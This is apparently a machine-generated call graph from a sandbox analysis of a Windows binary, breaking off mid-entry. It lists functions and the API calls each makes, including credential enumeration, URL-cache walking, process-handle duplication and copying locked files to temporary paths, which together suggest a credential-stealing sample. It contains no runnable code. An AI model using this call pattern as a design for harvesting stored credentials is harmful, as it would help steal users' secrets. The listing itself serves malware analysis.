37977->37980 37978 4111af 37980->37978 37981 4111a6 qsort 37980->37981 37981->37978 37984->37781 37986 40eb10 37985->37986 37998 40e8e0 37986->37998 37989 40eb6c memcpy memcpy 37990 40ebb7 37989->37990 37990->37989 37991 40ebf2 ??2@YAPAXI ??2@YAPAXI 37990->37991 37993 40d134 16 API calls 37990->37993 37992 40ec2e ??2@YAPAXI 37991->37992 37996 40ec65 37991->37996 37992->37996 37993->37990 37996->37996 38008 40ea7f 37996->38008 37997 402f49 37997->37781 37999 40e8f2 37998->37999 38000 40e8eb ??3@YAXPAX 37998->38000 38001 40e900 37999->38001 38002 40e8f9 ??3@YAXPAX 37999->38002 38000->37999 38003 40e911 38001->38003 38004 40e90a ??3@YAXPAX 38001->38004 38002->38001 38005 40e931 ??2@YAPAXI ??2@YAPAXI 38003->38005 38006 40e921 ??3@YAXPAX 38003->38006 38007 40e92a ??3@YAXPAX 38003->38007 38004->38003 38005->37989 38006->38007 38007->38005 38009 40aa04 free 38008->38009 38010 40ea88 38009->38010 38011 40aa04 free 38010->38011 38012 40ea90 38011->38012 38013 40aa04 free 38012->38013 38014 40ea98 38013->38014 38015 40aa04 free 38014->38015 38016 40eaa0 38015->38016 38017 40a9ce 4 API calls 38016->38017 38018 40eab3 38017->38018 38019 40a9ce 4 API calls 38018->38019 38020 40eabd 38019->38020 38021 40a9ce 4 API calls 38020->38021 38022 40eac7 38021->38022 38023 40a9ce 4 API calls 38022->38023 38024 40ead1 38023->38024 38024->37997 38025->37957 38026->37961 38084 40b2cc 38027->38084 38029 402b0a 38030 40b2cc 27 API calls 38029->38030 38031 402b23 38030->38031 38032 40b2cc 27 API calls 38031->38032 38033 402b3a 38032->38033 38034 40b2cc 27 API calls 38033->38034 38035 402b54 38034->38035 38036 40b2cc 27 API calls 38035->38036 38037 402b6b 38036->38037 38038 40b2cc 27 API calls 38037->38038 38039 402b82 38038->38039 38040 40b2cc 27 API calls 38039->38040 38041 402b99 38040->38041 38042 40b2cc 27 API calls 38041->38042 38043 402bb0 38042->38043 38044 40b2cc 27 API calls 38043->38044 38045 402bc7 38044->38045 38046 40b2cc 27 API calls 38045->38046 38047 402bde 38046->38047 38048 40b2cc 27 API calls 38047->38048 38049 402bf5 38048->38049 38050 40b2cc 27 API calls 38049->38050 38051 402c0c 38050->38051 38052 40b2cc 27 API calls 38051->38052 38053 402c23 38052->38053 38054 40b2cc 27 API calls 38053->38054 38055 402c3a 38054->38055 38056 40b2cc 27 API calls 38055->38056 38057 402c51 38056->38057 38058 40b2cc 27 API calls 38057->38058 38059 402c68 38058->38059 38060 40b2cc 27 API calls 38059->38060 38061 402c7f 38060->38061 38062 40b2cc 27 API calls 38061->38062 38063 402c99 38062->38063 38064 40b2cc 27 API calls 38063->38064 38065 402cb3 38064->38065 38066 40b2cc 27 API calls 38065->38066 38067 402cd5 38066->38067 38068 40b2cc 27 API calls 38067->38068 38069 402cf0 38068->38069 38070 40b2cc 27 API calls 38069->38070 38071 402d0b 38070->38071 38072 40b2cc 27 API calls 38071->38072 38073 402d26 38072->38073 38074 40b2cc 27 API calls 38073->38074 38075 402d3e 38074->38075 38076 40b2cc 27 API calls 38075->38076 38077 402d59 38076->38077 38078 40b2cc 27 API calls 38077->38078 38079 402d78 38078->38079 38080 40b2cc 27 API calls 38079->38080 38081 402d93 38080->38081 38082 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38081->38082 38082->37965 38083->37955 38087 40b58d 38084->38087 38086 40b2d1 38086->38029 38088 40b5a4 GetModuleHandleW FindResourceW 38087->38088 38089 40b62e 38087->38089 38090 40b5c2 LoadResource 38088->38090 38092 40b5e7 38088->38092 38089->38086 38091 40b5d0 SizeofResource LockResource 38090->38091 38090->38092 38091->38092 38092->38089 38100 40afcf 38092->38100 38094 40b608 memcpy 38103 40b4d3 memcpy 38094->38103 38096 40b61e 38104 40b3c1 18 API calls 38096->38104 38098 40b626 38105 40b04b 38098->38105 38101 40b04b ??3@YAXPAX 38100->38101 38102 40afd7 ??2@YAPAXI 38101->38102 38102->38094 38103->38096 38104->38098 38106 40b051 ??3@YAXPAX 38105->38106 38107 40b05f 38105->38107 38106->38107 38107->38089 38108->37973 38110 4032c4 38109->38110 38111 40b633 free 38110->38111 38112 403316 38111->38112 38131 44553b 38112->38131 38116 403480 38329 40368c 15 API calls 38116->38329 38118 403489 38119 40b633 free 38118->38119 38120 403495 38119->38120 38120->37975 38121 4033a9 memset memcpy 38122 4033ec wcscmp 38121->38122 38123 40333c 38121->38123 38122->38123 38123->38116 38123->38121 38123->38122 38327 4028e7 11 API calls 38123->38327 38328 40f508 6 API calls 38123->38328 38125 403421 _wcsicmp 38125->38123 38128 444a64 FreeLibrary 38127->38128 38129 444a83 38127->38129 38128->38129 38129->37975 38130->37976 38132 445548 38131->38132 38133 445599 38132->38133 38330 40c768 38132->38330 38134 4455a8 memset 38133->38134 38146 4457f2 38133->38146 38413 403988 38134->38413 38141 4458aa 38143 44594a 38141->38143 38144 4458bb memset memset 38141->38144 38142 445672 38424 403fbe memset memset memset memset memset 38142->38424 38148 4459ed 38143->38148 38149 44595e memset memset 38143->38149 38151 414c2e 17 API calls 38144->38151 38153 445854 38146->38153 38515 403e2d memset memset memset memset memset 38146->38515 38156 445a00 memset memset 38148->38156 38157 445b22 38148->38157 38158 414c2e 17 API calls 38149->38158 38150 4455e5 38150->38142 38161 44560f 38150->38161 38159 4458f9 38151->38159 38152 44557a 38154 44558c 38152->38154 38611 4136c0 CoTaskMemFree 38152->38611 38153->38141 38538 403c9c memset memset memset memset memset 38153->38538 38397 444b06 38154->38397 38561 414c2e 38156->38561 38164 445bca 38157->38164 38165 445b38 memset memset memset 38157->38165 38169 44599c 38158->38169 38160 40b2cc 27 API calls 38159->38160 38170 445909 38160->38170 38172 4087b3 338 API calls 38161->38172 38163 445849 38627 40b1ab free free 38163->38627 38171 445c8b memset memset 38164->38171 38228 445cf0 38164->38228 38175 445bd4 38165->38175 38176 445b98 38165->38176 38179 40b2cc 27 API calls 38169->38179 38188 409d1f 6 API calls 38170->38188 38180 414c2e 17 API calls 38171->38180 38189 445621 38172->38189 38173 445585 38612 41366b FreeLibrary 38173->38612 38174 44589f 38628 40b1ab free free 38174->38628 38186 414c2e 17 API calls 38175->38186 38176->38175 38182 445ba2 38176->38182 38191 4459ac 38179->38191 38192 445cc9 38180->38192 38700 4099c6 wcslen 38182->38700 38183 4456b2 38615 40b1ab free free 38183->38615 38185 40b2cc 27 API calls 38195 445a4f 38185->38195 38197 445be2 38186->38197 38187 403335 38326 4452e5 45 API calls 38187->38326 38200 445919 38188->38200 38613 4454bf 20 API calls 38189->38613 38190 445823 38190->38163 38209 4087b3 338 API calls 38190->38209 38201 409d1f 6 API calls 38191->38201 38203 409d1f 6 API calls 38192->38203 38193 445879 38193->38174 38213 4087b3 338 API calls 38193->38213 38577 409d1f wcslen wcslen 38195->38577 38207 40b2cc 27 API calls 38197->38207 38198 445d3d 38226 40b2cc 27 API calls 38198->38226 38199 445d88 memset memset memset 38210 414c2e 17 API calls 38199->38210 38629 409b98 GetFileAttributesW 38200->38629 38202 4459bc 38201->38202 38696 409b98 GetFileAttributesW 38202->38696 38212 445ce1 38203->38212 38204 445bb3 38703 445403 memset 38204->38703 38205 445680 38205->38183 38447 4087b3 memset 38205->38447 38216 445bf3 38207->38216 38209->38190 38219 445dde 38210->38219 38720 409b98 GetFileAttributesW 38212->38720 38213->38193 38225 409d1f 6 API calls 38216->38225 38217 445928 38217->38143 38630 40b6ef 38217->38630 38227 40b2cc 27 API calls 38219->38227 38220 4459cb 38220->38148 38237 40b6ef 253 API calls 38220->38237 38224 40b2cc 27 API calls 38230 445a94 38224->38230 38232 445c07 38225->38232 38233 445d54 _wcsicmp 38226->38233 38236 445def 38227->38236 38228->38187 38228->38198 38228->38199 38229 445389 259 API calls 38229->38164 38582 40ae18 38230->38582 38231 44566d 38231->38146 38498 413d4c 38231->38498 38240 445389 259 API calls 38232->38240 38241 445d71 38233->38241 38303 445d67 38233->38303 38235 445665 38614 40b1ab free free 38235->38614 38242 409d1f 6 API calls 38236->38242 38237->38148 38245 445c17 38240->38245 38721 445093 23 API calls 38241->38721 38248 445e03 38242->38248 38244 4456d8 38250 40b2cc 27 API calls 38244->38250 38251 40b2cc 27 API calls 38245->38251 38247 44563c 38247->38235 38253 4087b3 338 API calls 38247->38253 38722 409b98 GetFileAttributesW 38248->38722 38249 40b6ef 253 API calls 38249->38187 38256 4456e2 38250->38256 38257 445c23 38251->38257 38252 445d83 38252->38187 38253->38247 38255 445e12 38261 445e6b 38255->38261 38265 40b2cc 27 API calls 38255->38265 38616 413fa6 _wcsicmp _wcsicmp 38256->38616 38260 409d1f 6 API calls 38257->38260 38263 445c37 38260->38263 38724 445093 23 API calls 38261->38724 38262 4456eb 38268 4456fd memset memset memset memset 38262->38268 38269 4457ea 38262->38269 38270 445389 259 API calls 38263->38270 38264 445b17 38697 40aebe 38264->38697 38272 445e33 38265->38272 38617 409c70 wcscpy wcsrchr 38268->38617 38620 413d29 38269->38620 38276 445c47 38270->38276 38277 409d1f 6 API calls 38272->38277 38274 445e7e 38278 445f67 38274->38278 38281 40b2cc 27 API calls 38276->38281 38282 445e47 38277->38282 38283 40b2cc 27 API calls 38278->38283 38279 445ab2 memset 38284 40b2cc 27 API calls 38279->38284 38286 445c53 38281->38286 38723 409b98 GetFileAttributesW 38282->38723 38288 445f73 38283->38288 38289 445aa1 38284->38289 38285 409c70 2 API calls 38290 44577e 38285->38290 38291 409d1f 6 API calls 38286->38291 38293 409d1f 6 API calls 38288->38293 38289->38264 38289->38279 38294 409d1f 6 API calls 38289->38294 38589 40add4 38289->38589 38594 445389 38289->38594 38603 40ae51 38289->38603 38295 409c70 2 API calls 38290->38295 38296 445c67 38291->38296 38292 445e56 38292->38261 38300 445e83 memset 38292->38300 38297 445f87 38293->38297 38294->38289 38298 44578d 38295->38298 38299 445389 259 API calls 38296->38299 38727 409b98 GetFileAttributesW 38297->38727 38298->38269 38305 40b2cc 27 API calls 38298->38305 38299->38164 38304 40b2cc 27 API calls 38300->38304 38303->38187 38303->38249 38307 445eab 38304->38307 38306 4457a8 38305->38306 38308 409d1f 6 API calls 38306->38308 38309 409d1f 6 API calls 38307->38309 38310 4457b8 38308->38310 38311 445ebf 38309->38311 38619 409b98 GetFileAttributesW 38310->38619 38313 40ae18 9 API calls 38311->38313 38321 445ef5 38313->38321 38314 4457c7 38314->38269 38316 4087b3 338 API calls 38314->38316 38315 40ae51 9 API calls 38315->38321 38316->38269 38317 445f5c 38318 40aebe FindClose 38317->38318 38318->38278 38319 40add4 2 API calls 38319->38321 38320 40b2cc 27 API calls 38320->38321 38321->38315 38321->38317 38321->38319 38321->38320 38322 409d1f 6 API calls 38321->38322 38324 445f3a 38321->38324 38725 409b98 GetFileAttributesW 38321->38725 38322->38321 38726 445093 23 API calls 38324->38726 38326->38123 38327->38125 38328->38123 38329->38118 38331 40c775 38330->38331 38728 40b1ab free free 38331->38728 38333 40c788 38729 40b1ab free free 38333->38729 38335 40c790 38730 40b1ab free free 38335->38730 38337 40c798 38338 40aa04 free 38337->38338 38339 40c7a0 38338->38339 38731 40c274 memset 38339->38731 38344 40a8ab 9 API calls 38345 40c7c3 38344->38345 38346 40a8ab 9 API calls 38345->38346 38347 40c7d0 38346->38347 38760 40c3c3 38347->38760 38351 40c877 38360 40bdb0 38351->38360 38352 40c86c 38802 4053fe 39 API calls 38352->38802 38358 40c7e5 38358->38351 38358->38352 38359 40c634 50 API calls 38358->38359 38785 40a706 38358->38785 38359->38358 39031 404363 38360->39031 38364 40bdee 38367 40b2cc 27 API calls 38364->38367 38369 40bf5d 38364->38369 38365 40bddf CredEnumerateW 38365->38364 38368 40be02 wcslen 38367->38368 38368->38369 38377 40be1e 38368->38377 39051 40440c 38369->39051 38370 40be26 wcsncmp 38370->38377 38373 40be7d memset 38374 40bea7 memcpy 38373->38374 38373->38377 38375 40bf11 wcschr 38374->38375 38374->38377 38375->38377 38376 40b2cc 27 API calls 38378 40bef6 _wcsnicmp 38376->38378 38377->38369 38377->38370 38377->38373 38377->38374 38377->38375 38377->38376 38379 40bf43 LocalFree 38377->38379 39054 40bd5d 28 API calls 38377->39054 39055 404423 38377->39055 38378->38375 38378->38377 38379->38377 38380 4135f7 39070 4135e0 38380->39070 38383 40b2cc 27 API calls 38384 41360d 38383->38384 38385 40a804 8 API calls 38384->38385 38386 413613 38385->38386 38387 41361b 38386->38387 38388 41363e 38386->38388 38389 40b273 27 API calls 38387->38389 38390 4135e0 FreeLibrary 38388->38390 38391 413625 GetProcAddress 38389->38391 38392 413643 38390->38392 38391->38388 38393 413648 38391->38393 38392->38152 38394 413658 38393->38394 38395 4135e0 FreeLibrary 38393->38395 38394->38152 38396 413666 38395->38396 38396->38152 39073 4449b9 38397->39073 38400 444c1f 38400->38133 38401 4449b9 42 API calls 38403 444b4b 38401->38403 38402 444c15 38405 4449b9 42 API calls 38402->38405 38403->38402 39094 444972 GetVersionExW 38403->39094 38405->38400 38406 444b99 memcmp 38411 444b8c 38406->38411 38407 444c0b 39098 444a85 42 API calls 38407->39098 38411->38406 38411->38407 39095 444aa5 42 API calls 38411->39095 39096 40a7a0 GetVersionExW 38411->39096 39097 444a85 42 API calls 38411->39097 38414 40399d 38413->38414 39099 403a16 38414->39099 38417 403a12 wcsrchr 38417->38150 38418 4039a3 38421 4039f4 38418->38421 38423 403a09 38418->38423 39110 40a02c CreateFileW 38418->39110 38422 4099c6 2 API calls 38421->38422 38421->38423 38422->38423 39113 40b1ab free free 38423->39113 38425 414c2e 17 API calls 38424->38425 38426 404048 38425->38426 38427 414c2e 17 API calls 38426->38427 38428 404056 38427->38428 38429 409d1f 6 API calls 38428->38429 38430 404073 38429->38430 38431 409d1f 6 API calls 38430->38431 38432 40408e 38431->38432 38433 409d1f 6 API calls 38432->38433 38434 4040a6 38433->38434 38435 403af5 20 API calls 38434->38435 38436 4040ba 38435->38436 38437 403af5 20 API calls 38436->38437 38438 4040cb 38437->38438 39140 40414f memset 38438->39140 38440 404140 39154 40b1ab free free 38440->39154 38442 4040ec memset 38445 4040e0 38442->38445 38443 404148 38443->38205 38444 4099c6 2 API calls 38444->38445 38445->38440 38445->38442 38445->38444 38446 40a8ab 9 API calls 38445->38446 38446->38445 39167 40a6e6 WideCharToMultiByte 38447->39167 38449 4087ed 39168 4095d9 memset 38449->39168 38452 408809 memset memset memset memset memset 38453 40b2cc 27 API calls 38452->38453 38454 4088a1 38453->38454 38455 409d1f 6 API calls 38454->38455 38456 4088b1 38455->38456 38457 40b2cc 27 API calls 38456->38457 38458 4088c0 38457->38458 38459 409d1f 6 API calls 38458->38459 38460 4088d0 38459->38460 38461 40b2cc 27 API calls 38460->38461 38462 4088df 38461->38462 38463 409d1f 6 API calls 38462->38463 38464 4088ef 38463->38464 38465 40b2cc 27 API calls 38464->38465 38466 4088fe 38465->38466 38467 409d1f 6 API calls 38466->38467 38468 40890e 38467->38468 38469 40b2cc 27 API calls 38468->38469 38470 40891d 38469->38470 38480 408953 38480->38205 38499 40b633 free 38498->38499 38500 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38499->38500 38501 413f00 Process32NextW 38500->38501 38502 413da5 OpenProcess 38501->38502 38503 413f17 CloseHandle 38501->38503 38504 413df3 memset 38502->38504 38508 413eb0 38502->38508 38503->38244 39593 413f27 38504->39593 38506 413ebf free 38506->38508 38507 413e1f 38510 413e37 GetModuleHandleW 38507->38510 39598 413959 38507->39598 39614 413ca4 38507->39614 38508->38501 38508->38506 38509 4099f4 3 API calls 38508->38509 38509->38508 38510->38507 38512 413e46 GetProcAddress 38510->38512 38512->38507 38514 413ea2 CloseHandle 38514->38508 38516 414c2e 17 API calls 38515->38516 38517 403eb7 38516->38517 38518 414c2e 17 API calls 38517->38518 38519 403ec5 38518->38519 38520 409d1f 6 API calls 38519->38520 38521 403ee2 38520->38521 38522 409d1f 6 API calls 38521->38522 38523 403efd 38522->38523 38524 409d1f 6 API calls 38523->38524 38525 403f15 38524->38525 38526 403af5 20 API calls 38525->38526 38527 403f29 38526->38527 38528 403af5 20 API calls 38527->38528 38529 403f3a 38528->38529 38530 40414f 33 API calls 38529->38530 38536 403f4f 38530->38536 38531 403faf 39628 40b1ab free free 38531->39628 38533 403f5b memset 38533->38536 38534 403fb7 38534->38190 38535 4099c6 2 API calls 38535->38536 38536->38531 38536->38533 38536->38535 38537 40a8ab 9 API calls 38536->38537 38537->38536 38539 414c2e 17 API calls 38538->38539 38540 403d26 38539->38540 38541 414c2e 17 API calls 38540->38541 38542 403d34 38541->38542 38543 409d1f 6 API calls 38542->38543 38544 403d51 38543->38544 38545 409d1f 6 API calls 38544->38545 38546 403d6c 38545->38546 38547 409d1f 6 API calls 38546->38547 38548 403d84 38547->38548 38549 403af5 20 API calls 38548->38549 38550 403d98 38549->38550 38551 403af5 20 API calls 38550->38551 38552 403da9 38551->38552 38553 40414f 33 API calls 38552->38553 38559 403dbe 38553->38559 38554 403e1e 39629 40b1ab free free 38554->39629 38556 403dca memset 38556->38559 38557 403e26 38557->38193 38558 4099c6 2 API calls 38558->38559 38559->38554 38559->38556 38559->38558 38560 40a8ab 9 API calls 38559->38560 38560->38559 38562 414b81 9 API calls 38561->38562 38563 414c40 38562->38563 38564 414c73 memset 38563->38564 39630 409cea 38563->39630 38566 414c94 38564->38566 39633 414592 RegOpenKeyExW 38566->39633 38568 414c64 SHGetSpecialFolderPathW 38570 414d0b 38568->38570 38570->38185 38571 414cf4 wcscpy 38571->38570 38572 414cc1 38572->38571 39634 414bb0 wcscpy 38572->39634 38574 414cd2 39635 4145ac RegQueryValueExW 38574->39635 38576 414ce9 RegCloseKey 38576->38571 38578 409d62 38577->38578 38579 409d43 wcscpy 38577->38579 38578->38224 38580 409719 2 API calls 38579->38580 38581 409d51 wcscat 38580->38581 38581->38578 38583 40aebe FindClose 38582->38583 38584 40ae21 38583->38584 38585 4099c6 2 API calls 38584->38585 38586 40ae35 38585->38586 38587 409d1f 6 API calls 38586->38587 38588 40ae49 38587->38588 38588->38289 38590 40ade0 38589->38590 38591 40ae0f 38589->38591 38590->38591 38592 40ade7 wcscmp 38590->38592 38591->38289 38592->38591 38593 40adfe wcscmp 38592->38593 38593->38591 38595 40ae18 9 API calls 38594->38595 38597 4453c4 38595->38597 38596 40ae51 9 API calls 38596->38597 38597->38596 38598 4453f3 38597->38598 38599 40add4 2 API calls 38597->38599 38602 445403 254 API calls 38597->38602 38600 40aebe FindClose 38598->38600 38599->38597 38601 4453fe 38600->38601 38601->38289 38602->38597 38604 40ae7b FindNextFileW 38603->38604 38605 40ae5c FindFirstFileW 38603->38605 38606 40ae94 38604->38606 38607 40ae8f 38604->38607 38605->38606 38609 40aeb6 38606->38609 38610 409d1f 6 API calls 38606->38610 38608 40aebe FindClose 38607->38608 38608->38606 38609->38289 38610->38609 38611->38173 38612->38154 38613->38247 38614->38231 38615->38231 38616->38262 38618 409c89 38617->38618 38618->38285 38619->38314 38621 413d39 38620->38621 38622 413d2f FreeLibrary 38620->38622 38623 40b633 free 38621->38623 38622->38621 38624 413d42 38623->38624 38625 40b633 free 38624->38625 38626 413d4a 38625->38626 38626->38146 38627->38153 38628->38141 38629->38217 38631 44db70 38630->38631 38632 40b6fc memset 38631->38632 38633 409c70 2 API calls 38632->38633 38634 40b732 wcsrchr 38633->38634 38635 40b743 38634->38635 38636 40b746 memset 38634->38636 38635->38636 38637 40b2cc 27 API calls 38636->38637 38638 40b76f 38637->38638 38639 409d1f 6 API calls 38638->38639 38640 40b783 38639->38640 39636 409b98 GetFileAttributesW 38640->39636 38642 40b792 38643 40b7c2 38642->38643 38644 409c70 2 API calls 38642->38644 39637 40bb98 38643->39637 38646 40b7a5 38644->38646 38650 40b2cc 27 API calls 38646->38650 38648 40b837 CloseHandle 38652 40b83e memset 38648->38652 38649 40b817 38651 409a45 3 API calls 38649->38651 38653 40b7b2 38650->38653 38654 40b827 CopyFileW 38651->38654 39670 40a6e6 WideCharToMultiByte 38652->39670 38656 409d1f 6 API calls 38653->38656 38654->38652 38656->38643 38657 40b866 38658 444432 121 API calls 38657->38658 38659 40b879 38658->38659 38660 40bad5 38659->38660 38661 40b273 27 API calls 38659->38661 38662 40baeb 38660->38662 38663 40bade DeleteFileW 38660->38663 38664 40b89a 38661->38664 38665 40b04b ??3@YAXPAX 38662->38665 38663->38662 38667 438552 134 API calls 38664->38667 38666 40baf3 38665->38666 38666->38143 38668 40b8a4 38667->38668 38669 40bacd 38668->38669 38671 4251c4 137 API calls 38668->38671 38670 443d90 111 API calls 38669->38670 38670->38660 38693 40b8b8 38671->38693 38672 40bac6 39680 424f26 123 API calls 38672->39680 38673 40b8bd memset 39671 425413 17 API calls 38673->39671 38676 425413 17 API calls 38676->38693 38679 40a71b MultiByteToWideChar 38679->38693 38682 40b9b5 memcmp 38682->38693 38683 4099c6 2 API calls 38683->38693 38684 404423 38 API calls 38684->38693 38687 4251c4 137 API calls 38687->38693 38688 40bb3e memset memcpy 39681 40a734 MultiByteToWideChar 38688->39681 38690 40bb88 LocalFree 38690->38693 38693->38672 38693->38673 38693->38676 38693->38679 38693->38682 38693->38683 38693->38684 38693->38687 38693->38688 38694 40ba5f memcmp 38693->38694 38695 40a734 MultiByteToWideChar 38693->38695 39672 4253ef 16 API calls 38693->39672 39673 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38693->39673 39674 4253af 17 API calls 38693->39674 39675 4253cf 17 API calls 38693->39675 39676 447280 memset 38693->39676 39677 447960 memset memcpy memcpy memcpy 38693->39677 39678 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38693->39678 39679 447920 memcpy memcpy memcpy 38693->39679 38694->38693 38695->38693 38696->38220 38698 40aed1 38697->38698 38699 40aec7 FindClose 38697->38699 38698->38157 38699->38698 38701 4099d7 38700->38701 38702 4099da memcpy 38700->38702 38701->38702 38702->38204 38704 40b2cc 27 API calls 38703->38704 38705 44543f 38704->38705 38706 409d1f 6 API calls 38705->38706 38707 44544f 38706->38707 39768 409b98 GetFileAttributesW 38707->39768 38709 44545e 38710 445476 38709->38710 38711 40b6ef 253 API calls 38709->38711 38712 40b2cc 27 API calls 38710->38712 38711->38710 38713 445482 38712->38713 38714 409d1f 6 API calls 38713->38714 38715 445492 38714->38715 39769 409b98 GetFileAttributesW 38715->39769 38717 4454a1 38718 4454b9 38717->38718 38719 40b6ef 253 API calls 38717->38719 38718->38229 38719->38718 38720->38228 38721->38252 38722->38255 38723->38292 38724->38274 38725->38321 38726->38321 38727->38303 38728->38333 38729->38335 38730->38337 38732 414c2e 17 API calls 38731->38732 38733 40c2ae 38732->38733 38803 40c1d3 38733->38803 38738 40c3be 38755 40a8ab 38738->38755 38739 40afcf 2 API calls 38740 40c2fd FindFirstUrlCacheEntryW 38739->38740 38741 40c3b6 38740->38741 38742 40c31e wcschr 38740->38742 38743 40b04b ??3@YAXPAX 38741->38743 38744 40c331 38742->38744 38745 40c35e FindNextUrlCacheEntryW 38742->38745 38743->38738 38747 40a8ab 9 API calls 38744->38747 38745->38742 38746 40c373 GetLastError 38745->38746 38748 40c3ad FindCloseUrlCache 38746->38748 38749 40c37e 38746->38749 38750 40c33e wcschr 38747->38750 38748->38741 38751 40afcf 2 API calls 38749->38751 38750->38745 38752 40c34f 38750->38752 38753 40c391 FindNextUrlCacheEntryW 38751->38753 38754 40a8ab 9 API calls 38752->38754 38753->38742 38753->38748 38754->38745 38958 40a97a 38755->38958 38758 40a8cc 38758->38344 38759 40a8d0 7 API calls 38759->38758 38963 40b1ab free free 38760->38963 38762 40c3dd 38763 40b2cc 27 API calls 38762->38763 38764 40c3e7 38763->38764 38964 414592 RegOpenKeyExW 38764->38964 38766 40c3f4 38767 40c50e 38766->38767 38768 40c3ff 38766->38768 38782 405337 38767->38782 38769 40a9ce 4 API calls 38768->38769 38770 40c418 memset 38769->38770 38965 40aa1d 38770->38965 38773 40c471 38775 40c47a _wcsupr 38773->38775 38774 40c505 RegCloseKey 38774->38767 38776 40a8d0 7 API calls 38775->38776 38777 40c498 38776->38777 38778 40a8d0 7 API calls 38777->38778 38779 40c4ac memset 38778->38779 38780 40aa1d 38779->38780 38781 40c4e4 RegEnumValueW 38780->38781 38781->38774 38781->38775 38967 405220 38782->38967 38786 4099c6 2 API calls 38785->38786 38787 40a714 _wcslwr 38786->38787 38788 40c634 38787->38788 39024 405361 38788->39024 38791 40c65c wcslen 39027 4053b6 39 API calls 38791->39027 38792 40c71d wcslen 38792->38358 38794 40c677 38795 40c713 38794->38795 39028 40538b 39 API calls 38794->39028 39030 4053df 39 API calls 38795->39030 38798 40c6a5 38798->38795 38799 40c6a9 memset 38798->38799 38800 40c6d3 38799->38800 39029 40c589 44 API calls 38800->39029 38802->38351 38804 40ae18 9 API calls 38803->38804 38810 40c210 38804->38810 38805 40ae51 9 API calls 38805->38810 38806 40c264 38807 40aebe FindClose 38806->38807 38809 40c26f 38807->38809 38808 40add4 2 API calls 38808->38810 38815 40e5ed memset memset 38809->38815 38810->38805 38810->38806 38810->38808 38811 40c231 _wcsicmp 38810->38811 38812 40c1d3 35 API calls 38810->38812 38811->38810 38813 40c248 38811->38813 38812->38810 38828 40c084 22 API calls 38813->38828 38816 414c2e 17 API calls 38815->38816 38817 40e63f 38816->38817 38818 409d1f 6 API calls 38817->38818 38819 40e658 38818->38819 38829 409b98 GetFileAttributesW 38819->38829 38821 40e667 38823 409d1f 6 API calls 38821->38823 38825 40e680 38821->38825 38823->38825 38824 40e68f 38826 40c2d8 38824->38826 38831 40e4b2 38824->38831 38830 409b98 GetFileAttributesW 38825->38830 38826->38738 38826->38739 38828->38810 38829->38821 38830->38824 38852 40e01e 38831->38852 38833 40e593 38834 40e5b0 38833->38834 38835 40e59c DeleteFileW 38833->38835 38836 40b04b ??3@YAXPAX 38834->38836 38835->38834 38838 40e5bb 38836->38838 38837 40e521 38837->38833 38875 40e175 38837->38875 38840 40e5c4 CloseHandle 38838->38840 38841 40e5cc 38838->38841 38840->38841 38843 40b633 free 38841->38843 38842 40e573 38845 40e584 38842->38845 38846 40e57c CloseHandle 38842->38846 38844 40e5db 38843->38844 38849 40b633 free 38844->38849 38896 40b1ab free free 38845->38896 38846->38845 38848 40e540 38848->38842 38895 40e2ab 30 API calls 38848->38895 38850 40e5e3 38849->38850 38850->38826 38897 406214 38852->38897 38855 40e16b 38855->38837 38858 40afcf 2 API calls 38859 40e08d OpenProcess 38858->38859 38860 40e0a4 GetCurrentProcess DuplicateHandle 38859->38860 38864 40e152 38859->38864 38861 40e0d0 GetFileSize 38860->38861 38862 40e14a CloseHandle 38860->38862 38933 409a45 GetTempPathW 38861->38933 38862->38864 38863 40e160 38867 40b04b ??3@YAXPAX 38863->38867 38864->38863 38866 406214 22 API calls 38864->38866 38866->38863 38867->38855 38868 40e0ea 38936 4096dc CreateFileW 38868->38936 38870 40e0f1 CreateFileMappingW 38871 40e140 CloseHandle CloseHandle 38870->38871 38872 40e10b MapViewOfFile 38870->38872 38871->38862 38873 40e13b CloseHandle 38872->38873 38874 40e11f WriteFile UnmapViewOfFile 38872->38874 38873->38871 38874->38873 38876 40e18c 38875->38876 38937 406b90 38876->38937 38879 40e1a7 memset 38885 40e1e8 38879->38885 38880 40e299 38947 4069a3 38880->38947 38886 40e283 38885->38886 38887 40dd50 _wcsicmp 38885->38887 38893 40e244 _snwprintf 38885->38893 38954 406e8f 13 API calls 38885->38954 38955 40742e 8 API calls 38885->38955 38956 40aae3 wcslen wcslen _memicmp 38885->38956 38957 406b53 SetFilePointerEx ReadFile 38885->38957 38888 40e291 38886->38888 38889 40e288 free 38886->38889 38887->38885 38890 40aa04 free 38888->38890 38889->38888 38890->38880 38894 40a8d0 7 API calls 38893->38894 38894->38885 38895->38848 38896->38833 38898 406294 CloseHandle 38897->38898 38899 406224 38898->38899 38900 4096c3 CreateFileW 38899->38900 38901 40622d 38900->38901 38902 406281 GetLastError 38901->38902 38904 40a2ef ReadFile 38901->38904 38903 40625a 38902->38903 38903->38855 38908 40dd85 memset 38903->38908 38905 406244 38904->38905 38905->38902 38906 40624b 38905->38906 38906->38903 38907 406777 19 API calls 38906->38907 38907->38903 38909 409bca GetModuleFileNameW 38908->38909 38910 40ddbe CreateFileW 38909->38910 38913 40ddf1 38910->38913 38911 40afcf ??2@YAPAXI ??3@YAXPAX 38911->38913 38912 41352f 9 API calls 38912->38913 38913->38911 38913->38912 38914 40de0b NtQuerySystemInformation 38913->38914 38915 40de3b CloseHandle GetCurrentProcessId 38913->38915 38914->38913 38916 40de54 38915->38916 38917 413d4c 46 API calls 38916->38917 38926 40de88 38917->38926 38918 40e00c 38919 413d29 free FreeLibrary 38918->38919 38920 40e014 38919->38920 38920->38855 38920->38858 38921 40dea9 _wcsicmp 38922 40dee7 OpenProcess 38921->38922 38923 40debd _wcsicmp 38921->38923 38922->38926 38923->38922 38924 40ded0 _wcsicmp 38923->38924 38924->38922 38924->38926 38925 40dfef CloseHandle 38925->38926 38926->38918 38926->38921 38926->38925 38927 40df78 38926->38927 38928 40df23 GetCurrentProcess DuplicateHandle 38926->38928 38931 40df8f CloseHandle 38926->38931 38927->38925 38927->38931 38932 40dfae _wcsicmp 38927->38932 38928->38926 38929 40df4c memset 38928->38929 38930 41352f 9 API calls 38929->38930 38930->38926 38931->38927 38932->38926 38932->38927 38934 409a74 GetTempFileNameW 38933->38934 38935 409a66 GetWindowsDirectoryW 38933->38935 38934->38868 38935->38934 38936->38870 38938 406bd5 38937->38938 38941 406bad 38937->38941 38940 4066bf free malloc memcpy free free 38938->38940 38946 406c0f 38938->38946 38939 